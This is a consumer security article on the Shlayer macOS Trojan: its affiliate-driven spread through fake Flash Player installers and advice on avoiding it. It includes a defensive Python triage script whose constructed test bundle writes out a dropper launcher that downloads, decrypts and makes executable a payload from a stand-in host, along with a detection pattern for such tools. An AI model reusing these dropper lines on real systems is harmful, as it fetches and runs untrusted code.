How a Social Engineering Assault Targets 10% of Mac Computers

The Shlayer Trojan is a remarkably persistent piece of malware. It first appeared in 2018 and is still a significant threat: according to Kaspersky, an antivirus vendor, it accounted for roughly 30% of all macOS malware detections in 2019, and about one in ten Mac users in Kaspersky's telemetry encountered it.

Its prevalence is largely due to the ingenious distribution scheme its operators built, not to the malware itself, which is technically ordinary. The infection rate also punctures the myth that Macs are inherently immune to such threats.

That may be a silver lining: user awareness is a critical defense against malware that, like Shlayer, spreads by exploiting what users don't know.

What explains Shlayer's success and staying power? Its simplicity.

A Basic Trojan Becomes a Serious Threat Through Affiliate Networks

Shlayer itself is an unremarkable Trojan downloader: once run, it installs further malware (mostly adware), siphons browsing data and floods the user with malicious advertisements. What sets it apart is its distribution strategy, which piggybacks on legitimate platforms through the active promotion of webmasters and content creators. Its operators built an extensive affiliate network of YouTubers, Wikipedia editors and website owners, paying them a commission of roughly $4 for each installation they drive through fake Flash Player downloads. Kaspersky counted more than 1,000 partner sites involved in the scheme.


Partners use various tactics to get users to click the malicious download link. A YouTuber might put a shortened link in a video description; a Wikipedia editor might embed it in a citation; for a webmaster the job is simpler still: insert a prompt on the page that carries the harmful link.

Tricking users into clicking a malicious link is one of the oldest tricks in the book, and it lets the Trojan do its damage on the victim's system. What is uncommon is seeing cybercriminals turn this tactic into a fully operational, sustainable business.

In this model the creators act as investors, paying their partners, who are otherwise legitimate content creators, about $4 per installation. That only makes sense if each infection generates enough revenue to justify the outlay.

Shlayer is primarily a delivery mechanism for payloads: adware, forced web redirects and other components that track browser activity. These pay in several ways: diverting user traffic to dangerous websites, harvesting browser histories, cookies and caches and selling them to advertisers, and displaying sponsored advertisements.

There is no precise estimate of the operators' earnings, but given that they can afford $4 per installation and that one in ten Macs was affected, even a conservative guess runs into millions of dollars.

The creators have certainly pulled off a masterstroke of social engineering, one that explains both the Trojan's continued existence and its profit potential.

Preventing the Attack

To be clear, Apple is not at fault for attacks of this kind: the Trojan exploits no vulnerability in macOS; the user installs it. Social engineering attacks exploit people, not system flaws. One practical caveat: Gatekeeper only blocks apps that are unsigned or come from unidentified developers, and researchers repeatedly found Shlayer droppers signed with valid Apple Developer IDs (which Apple later revoked), so a signed fake installer runs under the default "App Store and identified developers" setting as soon as the user opens it.

Security tools such as anti-malware help, and a VPN protects the privacy of your traffic, but neither stops a download you approve yourself; nothing beats awareness. In Shlayer's case the attackers counted on user naivety, and the malware's success depended on it.

Shlayer spreads through fake Flash Player downloads, exploiting a common misconception: many users don't know that Flash is obsolete and that modern browsers need no such plugin to play online content.
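If a "Flash Player" installer has already landed in Downloads, a cheap triage before double-clicking is to look inside the .app bundle. The script below is an added example, not code from the original article or from any Shlayer analysis. It assumes, as public write-ups of Shlayer droppers have described, that a fake installer's main executable is often a shell script that fetches and decrypts a second stage with curl/openssl rather than a compiled, code-signed Mach-O binary; the bundle names, Info.plist contents and script body it builds are constructed test data. It is pure Python, so it runs anywhere, not only on a Mac.

```python
"""Triage a downloaded macOS .app bundle for fake-installer tells.

Added example (not the article's or any vendor's code). Heuristics, all
assumptions: (1) nothing legitimately needs a Flash Player installer any
more; (2) a real installer's main executable is Mach-O, not a shell script;
(3) a script launcher that chains curl/openssl/chmod is a dropper pattern.
"""
import plistlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Mach-O magic numbers (32/64-bit, both byte orders) plus the universal (fat) header.
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",   # MH_MAGIC / MH_CIGAM
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",   # MH_MAGIC_64 / MH_CIGAM_64
    b"\xca\xfe\xba\xbe",                         # FAT_MAGIC
}
# Tool invocations a script-based dropper typically chains together (assumed indicators).
SUSPICIOUS_TOOLS = re.compile(r"\b(curl|wget|openssl\s+enc|xattr\s+-d|chmod\s+\+x|nohup)\b")
FLASH_NAMES = re.compile(r"flash\s*player|adobe\s*flash", re.IGNORECASE)


def main_executable(app: Path) -> Optional[Path]:
    """Resolve Contents/MacOS/<CFBundleExecutable>; None if the bundle is malformed."""
    info = app / "Contents" / "Info.plist"
    if not info.is_file():
        return None
    with info.open("rb") as fh:
        name = plistlib.load(fh).get("CFBundleExecutable")
    if not name:
        return None
    exe = app / "Contents" / "MacOS" / name
    return exe if exe.is_file() else None


def is_macho(path: Path) -> bool:
    """True if the file starts with a Mach-O or universal (fat) header."""
    with path.open("rb") as fh:
        return fh.read(4) in MACHO_MAGICS


def script_indicators(path: Path) -> List[str]:
    """Suspicious tool invocations found in a script-based executable, sorted."""
    text = path.read_text(errors="replace")
    return sorted({m.group(1) for m in SUSPICIOUS_TOOLS.finditer(text)})


def triage_app(app: Path) -> Dict[str, object]:
    """Collect findings for one bundle; verdict is 'suspicious' or 'no findings'."""
    findings: List[str] = []
    if FLASH_NAMES.search(app.name):
        findings.append("bundle name impersonates Flash Player (end-of-life; no installer is needed)")
    exe = main_executable(app)
    if exe is None:
        findings.append("no resolvable main executable (malformed bundle)")
    elif not is_macho(exe):
        findings.append("main executable is not Mach-O (script-based launcher)")
        tools = script_indicators(exe)
        if tools:
            findings.append("script invokes: " + ", ".join(tools))
    return {"app": str(app), "findings": findings,
            "verdict": "suspicious" if findings else "no findings"}


def _make_bundle(app: Path, exe_name: str, body: bytes) -> None:
    """Write a minimal bundle skeleton (constructed test data)."""
    macos = app / "Contents" / "MacOS"
    macos.mkdir(parents=True, exist_ok=True)
    with (app / "Contents" / "Info.plist").open("wb") as fh:
        plistlib.dump({"CFBundleExecutable": exe_name, "CFBundleIdentifier": "example.demo"}, fh)
    (macos / exe_name).write_bytes(body)


def write_demo_bundles(root: Path) -> Dict[str, Path]:
    """Two constructed samples: a script-based fake installer and a Mach-O app."""
    fake = root / "Install Adobe Flash Player.app"
    _make_bundle(fake, "Installer", (
        b"#!/bin/bash\ntmp=$(mktemp -d)\n"
        b"curl -fsSL http://example.invalid/p.zip -o $tmp/p.zip\n"   # constructed URL
        b"openssl enc -aes-256-cbc -d -k secret -in $tmp/p.zip | tar -xz -C $tmp\n"
        b"chmod +x $tmp/*\n"))
    benign = root / "Notes.app"
    _make_bundle(benign, "Notes", b"\xcf\xfa\xed\xfe" + b"\x00" * 60)  # MH_CIGAM_64 stub
    return {"fake": fake, "benign": benign}


def run_demo() -> Dict[str, Dict[str, object]]:
    """Build the constructed bundles in a temp dir and triage both."""
    with tempfile.TemporaryDirectory() as d:
        return {k: triage_app(v) for k, v in write_demo_bundles(Path(d)).items()}


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result["verdict"], result["findings"])
```

On a real Mac you would run `triage_app` on whatever sits in `~/Downloads` and pair it with `codesign -dv --verbose=4` and `spctl --assess` to check the signature; this offline version only covers what can be judged from the bundle's bytes.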


Anti-virus software and a VPN still matter for security and privacy on a Mac, but the single biggest factor behind many malware outbreaks is user ignorance.

Most Shlayer victims made the same mistake: they clicked a link to download a phony Flash Player. You do not need Flash in 2020, and if more people knew that, Shlayer could never have infected so many Macs.

So the best preventive measure against Shlayer and its like is simple: don't click shady links. If a website tells you to download Flash Player, or any other software, to watch a live stream through an unofficial channel or to get something for free, the link is almost always malicious and can compromise your privacy or the stability of your Mac.

It also helps to look into a site before you use it: search for its reputation and for user comments to see whether people trust it.

Finally, combine these common-sense measures with good anti-virus software and, if you use a VPN, one with an ad-blocking feature. That regimen should be enough to avoid most malware, especially social-engineering-driven families like Shlayer.

Bottom Line

macOS is a robust operating system, but the only cure for human ignorance is awareness. No OS, whether macOS, Windows or another, is immune to cybercriminals who deceive internet users for a living. The surest way to avoid the next Trojan is to resist clicking suspicious download links on unofficial websites; do that and you will sidestep a large share of the malware out there without even noticing.
